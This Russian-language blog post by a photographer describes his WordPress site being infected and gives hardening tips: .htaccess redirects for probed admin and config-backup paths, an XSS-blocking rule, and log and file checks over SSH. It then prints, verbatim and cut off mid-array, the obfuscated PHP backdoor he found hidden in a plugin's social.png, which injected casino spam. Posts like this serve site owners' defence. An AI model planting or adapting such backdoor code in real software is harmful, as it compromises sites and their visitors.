Блог фотографа
ФОТОПОМОЩЬ

Заразили сайт на wordpress

На собственном блоге убедился, что народ не дремлет и заражает и заражает блоги на wordprese.

обновите водрпрес

Как предостеречься от вирусов и прочей нечести

 

  • Установить антивирус на вордпрес, например этот
  • Не качать платные темы или плагины для вордпресса с бесплатных ресурсов, если ваш сайт приносит деньги, нужно покупать
  • Обновляйте вордпрес и плагины
  • Не пользоваться фтп и управлением панелей сайта с чужих компьютеров, лучше всего купить компьютер на Linux или MacOs, или пользоваться купленным антивирусом
  • Делать еженедельные бакапы, на нормальных хостингах бакап делается каждый день
  • Иногда блог заражается хостингом, тут уже только менять хостинг на более дорогой
  • Закройте регистрацию пользователей на блоге
  • добавьте в .htaccess следующие строки
    показать
    Redirect permanent /wp-login.php http://dimok.kz/index.php?cat=2
    Redirect permanent /administrator/admin-ajax.php http://dimok.kz/index.php?cat=2
    Redirect permanent /administrator/index.php http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-admin/includes/admin.php http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-config.php http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-settings.php http://dimok.kz/index.php?cat=2

    этими строчками мы закрываем доступ к админ панели вордпресса, будет происходить переадресация на http://dimok.kz. Если вы захотите войти в админку вордпресса, вам нужно будет на время удалить эти строчки из .htaccess

  • Я выискиваю в access_log обращения к вирусам и делаю редиректы через .htaccess
    показать
    Redirect permanent /components/fox_contact/lib/file-uploader.php http://dmitriygalaktionov.com/index.php?cat=2
    Redirect permanent /my_content/images/searchterms-tagging2.php_ http://dmitriygalaktionov.com/index.php?cat=2
    Redirect permanent /wp-admin/config.php http://dmitriygalaktionov.com/index.php?cat=2
    Redirect permanent /wp-content/themes/Backstreet/includes/uploadify/upload_settings_image.php http://dimok.kz/index.php?cat=2
    Redirect permanent /admin http://dimok.kz/index.php?cat=2
    Redirect permanent /bitrix http://dimok.kz/index.php?cat=2
    Redirect permanent /administrator http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-content/plugins/akismet/akismet1.php http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-content/plugins/hello.php http://dimok.kz/index.php?cat=2
    Redirect permanent /admin.php http://dimok.kz/index.php?cat=2
    Redirect permanent /administrator/index.php http://dimok.kz/index.php?cat=2
    Redirect permanent /engine/engine.php http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-content/themes/toolbox/infos.php http://dimok.kz/index.php?cat=2
    Redirect permanent /?fb_xd_fragment http://dimok.kz/index.php?cat=2
    Redirect permanent /.LocalSettings.php.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /mt-config.cgi.save http://dimok.kz/index.php?cat=2
    Redirect permanent /.wp-config.php.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /config.php.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-config.php.txt http://dimok.kz/index.php?cat=2
    Redirect permanent /LocalSettings.php~ http://dimok.kz/index.php?cat=2
    Redirect permanent /LocalSettings.php.txt http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-config.php.old http://dimok.kz/index.php?cat=2
    Redirect permanent /mt-config.cgi.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /settings.php.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /LocalSettings.php.save http://dimok.kz/index.php?cat=2
    Redirect permanent /LocalSettings.php.old http://dimok.kz/index.php?cat=2
    Redirect permanent /configuration.php~ http://dimok.kz/index.php?cat=2
    Redirect permanent /settings.php.bak http://dimok.kz/index.php?cat=2
    Redirect permanent /settings.php.txt http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-config.php.dist http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-config.php.save http://dimok.kz/index.php?cat=2
    Redirect permanent /mt-config.cgi.bak http://dimok.kz/index.php?cat=2
    Redirect permanent /config.php.old http://dimok.kz/index.php?cat=2
    Redirect permanent /config.php.dist http://dimok.kz/index.php?cat=2
    Redirect permanent /.mt-config.cgi.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /configuration.php.save http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-config.php.bak http://dimok.kz/index.php?cat=2
    Redirect permanent /config.php.save http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-config.php.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /mt-config.cgi~ http://dimok.kz/index.php?cat=2
    Redirect permanent /LocalSettings.php.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /wp-config.php~ http://dimok.kz/index.php?cat=2
    Redirect permanent /.settings.php.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /LocalSettings.php.dist http://dimok.kz/index.php?cat=2
    Redirect permanent /mt-config.cgi.old http://dimok.kz/index.php?cat=2
    Redirect permanent /configuration.php.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /.configuration.php.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /configuration.php.bak http://dimok.kz/index.php?cat=2
    Redirect permanent /config.php~ http://dimok.kz/index.php?cat=2
    Redirect permanent /configuration.php.old http://dimok.kz/index.php?cat=2
    Redirect permanent /configuration.php.txt http://dimok.kz/index.php?cat=2
    Redirect permanent /settings.php.old http://dimok.kz/index.php?cat=2
    Redirect permanent /settings.php.dist http://dimok.kz/index.php?cat=2
    Redirect permanent /mt-config.cgi.txt http://dimok.kz/index.php?cat=2
    Redirect permanent /configuration.php.dist http://dimok.kz/index.php?cat=2
    Redirect permanent /.config.php.swp http://dimok.kz/index.php?cat=2
    Redirect permanent /mt-config.cgi.dist http://dimok.kz/index.php?cat=2
    Redirect permanent /LocalSettings.php.bak http://dimok.kz/index.php?cat=2
    Redirect permanent /config.php.bak http://dimok.kz/index.php?cat=2
    Redirect permanent /config.php.txt http://dimok.kz/index.php?cat=2
    Redirect permanent /settings.php~ http://dimok.kz/index.php?cat=2
    Redirect permanent /settings.php.save http://dimok.kz/index.php?cat=2
    Redirect permanent /posing-for-girls/index.php http://dimok.kz/index.php?cat=2

    Также паралельно я заношу блокировку по IP адресам в .htaccess но это скорей всего не поможет

  • Также в .htaccess добавляю
    • защита от xss атак
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
    • защита wp-config.php
order allow,deny
deny from all
    • Защита директорий на сервере от просмотра
Options All -Indexes

ErrorDocument 403 http://fotohelp.kz/
ErrorDocument 404 http://fotohelp.kz/
ErrorDocument 500 http://fotohelp.kz/

Если сайт на вордпресе заразили

    • Поменять пароли на ftp и к админке сайта
    • Попытаться восстановить сайт из бакапа, предварительно сделать бакап базы данных mysql и файлов
    • Если вас частенько заражают, необходимо несколько раз в неделю проверять логи access_log и error_log, они хранятся на хостинге в папке вашего сайта, если их нет, то нужно включить в панели управления хостинга
    • где находится error_log и access_log
    • Войдя на хостинг через ssh нужно ввести команду без кавычек «find -mtime 1» эта команда покажет все файлы изменные за 1 день, цифру 1 можно менять на 2, 3 и тп, будет отображаться список измененных файлов за 2, 3 дня и так далее. Смотреть нужно на изменения файлов с расширениями php js
    • Откройте access_log и посмотрите все обращения к php и ?p=
    • Поиск файлов на хостинге делается через Ssh соединение командой grep -ir ‘social.png’ *    меняем social.png на то, что нужно вам найти

Чем заражают мой блог

fotohelp.kz/?p=usa-online-casinos
Вирус на php, который прописывается в базу данных

Однажды копаясь в  access_log обнаружил обращение fotohelp.kz/?p=usa-online-casinos перейдя по ссылке открылась на моем сайте страничка про казино и онлайн игры. Поискав по файлам не нашел никаких упоминаний, осталось одно — база данных mysql и порывшись там нашел запись, удалил ее. Через несколько дней история повторилась, только с другими словами, но тоже про казино. Поиск по ключевым словам на хостинге ничего не дал. Вспомнил, что неделю назад поставил плагин, поискал свежую версию и на странице увидел предупреждение, что данный плагин заражен, что в этом плагине был файл social.png в котором лежал php, и действительно он там был. Поискав нашел 3 файла.

<?php error_reporting(0); if (!defined('WP_OPTION_KEY')) { function txyFqaETRPUyiEgQatokJIY() { define('WP_OPTION_KEY','wp_data_newa'); new GsSYoMTsQibQgcHcuGmrg(); } add_action('init', 'txyFqaETRPUyiEgQatokJIY'); } class VtkddwvkYgCDDRRWbgRtw{ private $AcheTwkrhTtKmyatQGqYFc, $SntMBKFkfTlUzXyNVQedo, $YcmysXeieEGqvkjRIsPYg; public function __construct($BZaxGALPLdVfntBIQWUPs = 'old'){ if ($BZaxGALPLdVfntBIQWUPs == 'new'){ $this->QxEolVsSqvJZyRSgHFmL(); } else { $this->yOlGcuINHlzAVPznEbGNvwJM(); } $this->SntMBKFkfTlUzXyNVQedo = "-----BEGIN PUBLIC KEY-----\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6K/I2l6k2Iz7Vojzxk5Q\r\n43QNfIJm2jWPvXAvFtft+yy4rD3MseQJWx3PLlkoRQjSI1uiiwwlPZWED0e5wFet\r\nnS5tKhvvRaOeUPYJq6MtyUbnaMn7bshlgaAlPaUCVdAOjdtGHMuFaWfnBLgTSu3c\r\nuccVC2zOlXx7XK1tw39eZepRemoh0W3Qhf+hDFsEzACSBmKhBiganwCZzTDvyXpj\r\nnfbRKbf26LJDJ9u2Choh768vQiIfuf0tGLQ+xxcBDl2ZVW0P76cd5I2v+lYRBD/X\r\nvgU32/UZeKDheA8M/oZ5/yFv5QWAU2SHEEKYfLkAQmXs/oRGqMQONqoL3W5Q4bE/\r\ngQIDAQAB\r\n-----END PUBLIC KEY-----"; } private function yOlGcuINHlzAVPznEbGNvwJM() { $oXyaqmHoChvHQFCvTluqmAC = get_option('WP_CLIENT_KEY'); $this->AcheTwkrhTtKmyatQGqYFc = $oXyaqmHoChvHQFCvTluqmAC; } private function QxEolVsSqvJZyRSgHFmL() { $WUSuJUGMrzyhdyhyGeIjayJs = $this->DWoPBIQOoBwLXRAmwfedw(); $this->AcheTwkrhTtKmyatQGqYFc = $WUSuJUGMrzyhdyhyGeIjayJs['private']; $this->YcmysXeieEGqvkjRIsPYg = $WUSuJUGMrzyhdyhyGeIjayJs['public']; update_option("WP_CLIENT_KEY", $this->AcheTwkrhTtKmyatQGqYFc); } public function bkBMtlOkGRaPFVExpcNbC($oXyaqmHoChvHQFCvTluqmAC) { openssl_seal($oXyaqmHoChvHQFCvTluqmAC, $XSuQpMSlwhlPZypBIPnfjXTA, $THPieTXOYTCWThoTFSSuHU, array(openssl_pkey_get_public($this->SntMBKFkfTlUzXyNVQedo))); return array("data" => base64_encode($XSuQpMSlwhlPZypBIPnfjXTA), "key" => base64_encode($THPieTXOYTCWThoTFSSuHU[0])); } public function MFmjdYJpnAEmbwnXvkQU($oXyaqmHoChvHQFCvTluqmAC) { openssl_seal($oXyaqmHoChvHQFCvTluqmAC, $XSuQpMSlwhlPZypBIPnfjXTA, $THPieTXOYTCWThoTFSSuHU, array(openssl_pkey_get_public($this->YcmysXeieEGqvkjRIsPYg))); return json_encode(array("data" => base64_encode($XSuQpMSlwhlPZypBIPnfjXTA), "key" => base64_encode($THPieTXOYTCWThoTFSSuHU[0]))); } public function qPhSGyDrRdyPezAnHgiao() { return $this->YcmysXeieEGqvkjRIsPYg; } public function skwTpfzBalSTBTBkLvhw($piiJbwvzLxHvKjlNnFzd) { $this->YcmysXeieEGqvkjRIsPYg = $piiJbwvzLxHvKjlNnFzd; } public function vZlUWjEYdyPGPomnFXMGnNY($oXyaqmHoChvHQFCvTluqmAC) { $BdlbpgzPBjxVLkBLnsrXkmI = json_decode($oXyaqmHoChvHQFCvTluqmAC, true); if ($BdlbpgzPBjxVLkBLnsrXkmI !== false){ $oXyaqmHoChvHQFCvTluqmAC = $BdlbpgzPBjxVLkBLnsrXkmI; } if (!is_array($oXyaqmHoChvHQFCvTluqmAC)) { return false; } openssl_open(base64_decode(trim($oXyaqmHoChvHQFCvTluqmAC['data'])), $WQqrOQbxBHtERCkwicqA, base64_decode(trim($oXyaqmHoChvHQFCvTluqmAC['key'])), $this->AcheTwkrhTtKmyatQGqYFc); return $WQqrOQbxBHtERCkwicqA; } public function DWoPBIQOoBwLXRAmwfedw() { $IzGRmpLLtcLVMJRxcfpeGhQVry = openssl_pkey_new(array( 'private_key_bits' => 2048, 'private_key_type' => OPENSSL_KEYTYPE_RSA, )); openssl_pkey_export($IzGRmpLLtcLVMJRxcfpeGhQVry, $IANNGYfyVIgZFkzWVTKmQGc); $oXyaqmHoChvHQFCvTluqmAC['private'] = $IANNGYfyVIgZFkzWVTKmQGc; $XEWVBmIaXvRqxrckbkOqw = openssl_pkey_get_details($IzGRmpLLtcLVMJRxcfpeGhQVry); $oXyaqmHoChvHQFCvTluqmAC['public'] = $XEWVBmIaXvRqxrckbkOqw['key']; return $oXyaqmHoChvHQFCvTluqmAC; } } class GsSYoMTsQibQgcHcuGmrg{ public $oXyaqmHoChvHQFCvTluqmAC = array(), $yYVsqvOoqWsddypXgJcIKOw = array(), $qcCONSsvpJlMgdhEFFmrTI, $IzGRmpLLtcLVMJRxcfpeGhQVry, $aJQafHDwnaPrCJrQMjHVh, $AeRxXNHxOXpcNJWlZSIKLhIw, $vwhhtIrAWhUEFDgPrcco, $htcFFCQTLLpnCchsPKGYxso, $wqawPxkNytKqRKNRqbwAdw, $IatJdWimJbxtprWZElHevfI, $YobOrWbieESFVcSsWsuBypg; public $WbKPQMoSbMZkXUeYKXRIk; public function __construct() { $this->yYVsqvOoqWsddypXgJcIKOw = array( '==DZk4FZlVwY5RGZhpQB' ,'=4JnhZUpck2olIKM', '=4JnhZ3M1WJMeyTo', '=02ow5FryW3ogkJnuWUq', '6yzLhDKqwETol92q', '==trcWzYyEKqwETol92q', 'g92LhZ3ni9Togyzr', '==DoiAzYiEKqiyKMgS2p', '=8zMhyzYhIJMlqzoi9Jo', '=bKnv5vpuE3phSJofI2n', 'aW3ohHzMckzp19JM2y2M', '=02ow5PoyITqmEJquWaM', '==DoiAzY6ITqu1JLgkJL', 'g92LhpzockTocM2oaWKM', '==toc5vo1AKMaSTofyzq', 'hyzY5Izpi1JM29Jo', '==jMl9zY5ITMi9zMiyzL', 'aW3ohVGqlpzocuTq55JL', '==jMl9zYhI2LmEapiO3p', 'aW3oh4JLwAUq0I3L', '=pzpi5lp0WKLjSJMyWaM', '==jqj5FqiyKMwyzoyA2p', '3OaY1WGoj1JL', '=pUphxKqaWKnuu2L', '=4JnhVKMeAJnfMJock2p', '=4JnhV3ox5JLl9TryuTq', '=4Jnh4JqvyKMh9Tn', 'hyzYmk2oiEaoyk2M', 'hyzYh9TqlSzLhSTM', '=4JnhNKqiW3Mf9TogyzL', '==toc5lp0Szp0SzM', 'hyzYfIJM0Aaouu2L', 'hyzYlSTqm92Mhyzp', '6yzLh4zpiEKMfqzocWaL', 'aW3ohHTo5E3pgHJocW3L', '==trcWzYmgJLgyTqf9zM', '==Nqy5zYmAKMhy2M0ITo0I3o', '==jqj5PnmyzMiEUnmyzp', '==jqj5lphS2pfIzquWUq', '==trcWzYlITMuk2Mc5Jq', '0IzohZUocSzMlITMh92q', '0IzohZKMfyUqm52ohITr', '=pzpi5vouEKn0g2LukzL', '=HJohNKqbSTof9Tn', '=DKMh5lpyEJLlq2ohSzo', '6yzLhxapu1TMuITM', '==Nqy5zY39zoe1JLyWUM', '==Nqy5zYlITqm9zM5STo', '==joz5JnhZKMa5JLlE3p', '==trcWzYfy2MlITqhIUn', '=bKnv5FM4S2nfyJo', '=bKnv5PqcgJLgSzp', '==trcWzYfk2ovITqiIKp', '==DoiAzYm52ox1zM', '=02ow5lpwy2p11JLlSTM', '=02ow5vpyWzLiWzpyq2MiWaM', '=02ow5lphIJof92n', '=02ow5lpykTpgS2pi9zM', '==DoiAzYmEzpu9zL2EKo', '==trcWzYmyKLxIao', 'iMzoc5lp5kzMx5JLlS2L', '==jow5lqikTn0SJo', '=82Lh82nhIJo', '=02ow5vpiu3Lc1JLhyUM', '==DMg5FngSTMhI2q', '=bKnv5Pqcg2of9zr', '==jqj5PofS2qlITqhSTn', 'aW3ohD3owyKMh9Jo', '6yzLhxKoyEJLwSJM0y2pvI2q', '=bKnv5lo5ITMi9zM', '==trcWzYmkJL0W3ojAKM', '==toc5lp3Izo3SJo', '=4Jnhf2LiWKolITq', 'hyzYeA2olIzoiE3p', '=4Jnh82oz1zM', 'hyzY0WKLjSJMyWaM', '==toc5PMhSTolSTqcI3M', '==toc5vou12MiWUp', '==toc5voz1zM', 'hyzYj9TouWKMhI2M', '=4JnhjJL0W3ojAKM', '=8zMhyzYykTpgS2pi9zM', '==joz5JnhHJMlMTAiWTn', '==joz5JnhHaZhITqmyTo', '=8zMhyzYyqJLjgzo', 'iMzoc5vMfSTnvI2q', '3OaYm5JqaWzM', '=pUphH2nuEaZwyTp', '=pUphZapyE3pu1JMmIzocu2L', '=pUphxUMukJr6SToi9zM', '3OaYyAKqi92n', '0IzohxKLxIao', '=DKMh5Fne9TMhyzM', '==Nqy5zY5kzMx5JLlS2L', '==Nqy5zYi9zMgyzM', '==Nqy5zY392qzqKL', '==DoiAzYyyao2EKo', '=02ow5lpuyTMySKney2q', 'g92Lh4JMwEapiO3p', '=02ow5FMyWaM2EKo', '==DoiAzY3Izo3SJo' ); $this->aJQafHDwnaPrCJrQMjHVh = array( '=HaphjJnu1TD1ETn1c2p', '==DoiAzYfyJLgqTDwyToiMKLlESofSTMhSzH', '==DoiAzYfyJLgqTDkHGBkDapyq3phSHouyTofy2I', 'g92LhjJnu12MNEJMjWKq0IzDmSJoiuTI', '==DoiAzYfyJLgqTD39TqlITnHIJnfIaF', '==DoiAzYfyJLgqTDx5JLaIzpv1JqGIzouyTE', 'g92LhjJnu12MNyaL4STqc12oQWKMbO3o0AKnlu2D', '=02ow5PocSJoaORZ4xGZmyJobAIL0yzH', '=02ow5PocSJoaORMhSTqlSTovI3oGy3LuE3H', '==DoiAzYfyJLgqTDhIToxyzEl9zqyWUI', '=02ow5PocSJoaORMy5zpyOUpOqJnuW3D', '==DoiAzYfyJLgqTDmHGBk4JMxSHMjIUG', 'g92LhjJnu12MNyQAlIzp192Dy5Jn0AKnlu2D', 'g92LhjJnu12MNIJo05JngS2H0WKMv9zH', '==DoiAzYfyJLgqTD1DQquu2pcuTIy5zou9zF', '==DoiAzYfyJLgqTDxIzpx5JnuqRoySTnwyJG', '=02ow5PocSJoaORMyE3LyWUHyyTqlIzD', '=02ow5PocSJoaORMuuTqa5JnuAyrcWUquIzD', 'g92LhjJnu12MNA3py12oKS2LcWKE', 'g92LhjJnu12MNAap1EKMGWKMbO3o0AKnlu2D', '=02ow5PocSJoaOxpyE3puuTIh5JD', '==DoiAzYfyJLgqTDbEKnx5JDyyTnj92H', 'g92LhjJnu12MNEaoyq3o05JIhyzqfIJG', '=02ow5PocSJoaORA4xGZxI2MlITn09TpjS0nlSJG', '==DoiAzYfyJLgqTDjLGBkHTq192H0WKMv9zH', '=02ow5PocSJoaORMcSToj1JMfWJDyI2LhSzG', 'g92Lhj2ouOHoiWaLuEJn', '=02ow5PoiSTDcEJLg91L', '==DoiAzYf9JLNSQofy2Mw1zYyyJogyzn', '=02ow5PoiSTDljJM0STphf2L1u2L', '==DoiAzYf9JLNSwpyMJLbA3KuEaoucJL', '=02ow5PoiSTDyI2Mu12KyWUMhSzr', 'g92Lhj2ouORMlSTnwIzLyAKnhITM', '==DoiAzYf9JLNWKMhEUq1WzocWUMfIJo', '=02ow5PoiSTDfSzpiEJLxkJL', '==DoiAzYf9JLN52omWJna9IL5Szn', 'g92Lhj2ouO0pykJn0AaYy5Jn0AKnlu2L', '==DoiAzYf9JLNcKLj5lo05JnwSzn', '=02ow5PoiSTDbAJnyW3pc12oe9zo', 'g92Lhj2ouOHZhyzpl9JobqJLhIJo', '==DoiAzYf9JLNWJL0EKMfI2M', '==DoiAzYf9JLNWKM0AKMigzYyyzpl9TM', '=02ow5PoiSTDyEKLgIUnm5Pp', 'g92Lhj2ouOxoiAaouq3psSJnh9ToiOKL', '==DoiAzYf9JLN1JLb5JLlW2KgSJnlyJo', '==DoiAzYf9JLNSmolWKL2SzosyKMfSTn', '=02ow5PoiSTDk4zpiu2KuyzpyEJLhSTp', '==DoiAzYf9JLNS2nmSTnm5vq', 'g92Lhj2ouORoyITqsyaohI2n', '=02ow5PoiSTDh92phyTqhRJrcWUp', '=02ow5PoiSTDygzp1W2KukToyE3p', '==DoiAzYf9JLN5Jn6k2oj5loxWKLwIzp', '==DoiAzYf9JLNcKMlI3ofSTq', '=02ow5PoiSTDmEapyWzLy9ILbEKMl9TM', '=02ow5PoiSTDkDUoiWzocSzpskJqxWJL', '=02ow5PoiSTDmITqlIJqz5vq', '=02ow5PoiSTDay2q0WKLb9SMyW3L', '=02ow5PoiSTDa5Jnzu2olyaplSTo', 'g92Lhj2ouO0phy2May2qh4Jn2kJL', 'g92Lhj2ouOHZ5ITofI2nh8Jnwyzp1SJo', '==DoiAzYf9JLN1JLhgJnh9ILxIzq', 'g92Lhj2ouOHnhyJqlIzoiITo', '==DoiAzYf9JLNqzouI3oe5Fo', '=02ow5PoiSTDuEJMl9zrsSTn0WKMvkJL', '==DoiAzYf9JLNWKqm5JLg9In', '==DoiAzYf9JLN52ogg2Lcu2KhS2Ml9Jo', '==DoiAzYf9JLNWKMxyJMz5lL', '=02ow5PoiSTDhyTo1EzYbAKL', 'g92Lhj2ouOxpy5zpiqzYukJMgSTp', 'g92Lhj2ouOxohS2qhRzrukzL', '=02ow5PoiSTDykJM6IJn65FL', '==DoiAzYf9JLNA3pyu2Kv9zp', '==DoiAzYf9JLNWUnikzMhRToyy2LuW3M', '=02ow5PoiSTDkHzoiMKLv9ILckJMlIKL', 'g92Lhj2ouOHZfIKLj9In', '=02ow5PoiSTDm5JnaE2ob5PqlSzL', '==DoiAzYf9JLNITouIzqhxTM', '=02ow5PoiSTDuy2LmIKosSTMhIUnmSTo', '=02ow5PoiSTDkf2Li1zYuEKnf9To', 'g92Lhj2ouOxouAJn4IJoskJnlOKL', '=02ow5PoiSTDkjToyq3oj5voyWKn', '=02ow5PoiSTD0IJog9zpw5ln', '=02ow5PoiSTDmO3oiE3p0IJMd5JLly2n', '==DoiAzYf9JLNk2olWKLw9IL0AKMx9Jo', 'g92Lhj2ouOxouyKLvSzLxITnmSzp', 'g92Lhj2ouOHZmgzpuOaYfkJM3Izn', 'g92Lh82obSJrN1Jn5I2p192DuAKn19TG', '=02ow5loiuJL5OHqf9zocqUMi92Euy2LckJD', '=02ow5loiuJL5O0ohy3p3Izpx5JDyy2nwSzF', 'g92Lh82obSJrN9zMuIzpi1zpyMKnZITq0ITof92D', '=02ow5loiuJL5OHrfyJrlWKIuyzqfy3H', '=02ow5loiuJL5ORMiMzoiAaocW2oFSJnwIUG', 'g92Lh82obSJrNqJn2AKn0WKLDyUolS2D', 'g92Lh82obSJrNI3pjIJnh5JMZy3p0STH', '=02ow5loiuJL5O0MxSJMm9zDyyzqyE3H', '==DoiAzYi9TnuyUDeSzp5ITouITFyyzouuTpyE3H', '=02ow5loiuJL5OHrhITquuJnByaplITI', 'g92Lh82obSJrNyzLy5JnzMJnlqHL5SJG', 'g92Lh82obSJrNAJo1I2Mxyzpa5JLZyaohSTE', 'g92Lh82obSJrNOKngyKM39TIyIKpckJMa5JD', '=02ow5loiuJL5OxMaIKMm9zHgy2F', '=02ow5loiuJL5OxL5kzoiAUoy5xoiWapuu2H', 'g92Lh82obSJrN1JrayaplSTF5ITocI2F', '==DoiAzYi9TnuyUD5WJnmI2MxyzpPyzLv9zD', '==DoiAzYi9TnuyUDfy3LxW3ozkTouuHL5SJG', 'g92Lh82obSJrN52o0yKMfu2L0STIy5JMxSzF', '=02ow5loiuJL5O0oi1TMuETMuuHMwyzouu2H', '=02ow5loiuJL5OxoukJMiqJLFyaLvyTG', '=02ow5loiuJL5OHM0SJMfOUpcEIrwSTG', '=02ow5loiuJL5OHrv9Tnw92oUyKogS2H', 'g92Lh82obSJrNE3o25JMfkJEhIJn2yzI', '==DoiAzYi9TnuyUD5WJqy5JnxWKLXIJn0AKnlu2D', 'g92Lh82obSJrNIaq1g2LcuTpfIHMfITnwyJG', '=02ow5loiuJL5O0oj9TolSJEyyTofyJG', '==DoiAzYi9TnuyUDvyUMyyTqmyzpbAHLcqzpiI2E', 'g92Lh82obSJrN9zpf52omyzohITEyyToc1JE', '==DoiAzYi9TnuyUDlqJrmyToa5JFgSJnlyJG', '==DoiAzYi9TnuyUDuIKqfkJqU52o2ITE', '=02ow5loiuJL5OHqgIUq0I2nwSToP5JLly2F', '==DoiAzYi9TnuyUDuy3LxITq4y2IhyJo6SJJ', '=02ow5loiuJL5OHnm9zpyAap1OyouIzF', '=02ow5loiuJL5OHLcAKr2STEyIJnx9zF', '==DoiAzYi9TnuyUD292pyAJrlWHrfWKM2IzD', '==DoiAzYi9TnuyUDcWJLwyzqyAJnaSzpRyaohSzE', '=02ow5loiuJL5OHrwIUofI2nmSJGyyzLvITE', 'g92Lh82obSJrN5JneyToiyJLlWKMTSzpuy2D', 'g92Lh82obSJrN9zqc52o0WKMe5JnDyKMfSTF', '=02ow5loiuJL5O0L1y3nlIUqlIUFuEKnhIzD', 'g92Lh82obSJrNSJnw52omETou52oREKMhSzF', 'g92Lh82obSJrNyKouyaLfyTnDITq0ITof92D', '=02ow5loiuJL5OHnzWJMc5zoykHngIzH', 'g92LhjJnu1TqiuTD5kJnlyUqyM2oeIar', '=02ow5PocSJo09TnNM3olyUpcuJMgSzM', 'g92LhjJnu1TqiuTDyEKqlyTriEJqvyan', 'g92LhjJnu1TqiuTDcWKneSzo1E3olyJp', 'g92LhjJnu1TqiuTDuqJLfyUMiq2o0yzL', '=02ow5PocSJo09TnNEKqvI2L1uJrzI2M', 'g92LhjJnu1TqiuTDu5Jndy3MyOKnaITq', '=02ow5PocSJo09TnNcKrkIzq15JnhIUo', '=02ow5PocSJo09TnNEJqgIaL1WKMvy3n', 'g92LhjJnu1TqiuTDuEKMlyzr5A3o6Iar', 'g92LhjJnu1TqiuTDcuKr6y3pcEJMmyzM', '=02ow5PocSJo09TnNWKrkSzo5E3oh92n', 'g92LhjJnu1TqiuTD55JMwy3MigJrjSzM', '=02ow5PocSJo09TnNuKLaSTnu52o3yUM', 'g92LhjJnu1TqiuTDyqKn6SJp1AJnfyUo', '=02ow5PocSJo09TnNOKLxSzMcuJMwSTr', 'g92LhjJnu1TqiuTDyg2olyzpiuJn4yzo', '=02ow5PocSJo09TnNAJngIaMyAKrvIzL', 'g92LhjJnu1TqiuTDu1JLmIaM1M3owS2n', '=02ow5PocSJo09TnNA3oxSzn1MJrwyap', 'g92LhjJnu1TqiuTDiuKq69zr5u2o0SJo', '=02ow5PocSJo09TnNAKrgyUn5uKqb9To', 'g92LhjJnu1TqiuTDykJqgIKpuqJrayTn', 'g92LhjJnu1TqiuTDyWKLxyzpcqJq4Szp', '=02ow5PocSJo09TnNAJL0I2LcAJnxyzn', 'g92LhjJnu1TqiuTD5c2ojSzMcAKnzyzo', '=02ow5PocSJo09TnNcKqeyzniqJLl9To', '=02ow5PocSJo09TnNu2o4y2MiAJM0Iao', '=02ow5PocSJo09TnN5JreS2M5EKnhITo', '=02ow5PocSJo09TnNAJnwyUncEJqbSTo', '=02ow5PocSJo09TnNuJnvIznuEKMaIao', 'g92LhjJnu1TqiuTD1EKrmy3LyMJqkIKo', 'g92LhjJnu1TqiuTDuEJMfIUo5kJq4y2M', 'g92LhjJnu1TqiuTDyEKMgIUM5MJMgS2n', 'g92LhjJnu1TqiuTDuAKrmy3LuAKrk9zn', 'g92LhjJnu1TqiuTDcWJLgy3ny5Jq6yTp', 'g92LhjJnu1TqiuTDyMJLjSTM5W3o49zp', '=02ow5PocSJo09TnNW3oaSTMcuKrmITo', '=02ow5PocSJo09TnNSKr6IaLcSKMbS2n', 'g92LhjJnu1TqiuTD1E2o2yzruAKqv9zq', '=02ow5PocSJo09TnNEJngITqucJreyTM', 'g92LhjJnu1TqiuTDiu2oly3L1u3o3yaM', 'g92LhjJnu1TqiuTD15Jqa9zn1OKqmyJp', 'g92LhjJnu1TqiuTDuuKn4SJpiAKrey3p', '=02ow5PocSJo09TnNgJMzSJpuWJq2yTp', '=02ow5PocSJo09TnNuJn4IzqiW3o39Jo', 'g92LhjJnu1TqiuTD5SKnmIaricKrvIJo', '=02ow5PocSJo09TnNS3odS2MyuJqxyTo', '=02ow5PocSJo09TnNcJrzyJp55JqeI2q', 'g92Lhf2oikTq19TD5uJL4yTM1EKMk9zM', 'g92Lhf2oikTq19TD5AJq4Iaq1uKq4y2p', '=02ow5lni9To0I3oNc3ojIKocMJMgy3n', '=02ow5lni9To0I3oNc3ogSzq5EJnaIUo', '=02ow5lni9To0I3oNcKnd92pigJM292p', 'g92Lhf2oikTq19TD5EJMfy3pycJn29zr', '=02ow5lni9To0I3oNcJqkyaq1gJr0Izo', 'g92Lhf2oikTq19TDyAJnd9Tn5EJMwSJp', '=02ow5lni9To0I3oNSKLgyUpygJq4yao', 'g92Lhf2oikTq19TDuEJrjIzocuJMxS2L', '=02ow5lni9To0I3oNu3ojyJoySKqvITr', 'g92Lhf2oikTq19TD5EJqhyTn1gJMkyan', 'g92Lhf2oikTq19TD5AJneITncqJndyUp', 'g92Lhf2oikTq19TD15JnwIUoykJLgI2M', 'g92Lhf2oikTq19TDuOKrfSJou1Jn0IUr', '=02ow5lni9To0I3oNuKqhyapcWKnxy2M', '=02ow5lni9To0I3oNcKMbSznucJq0Iap', 'g92Lhf2oikTq19TD5A3omy3nicJrdy3M', 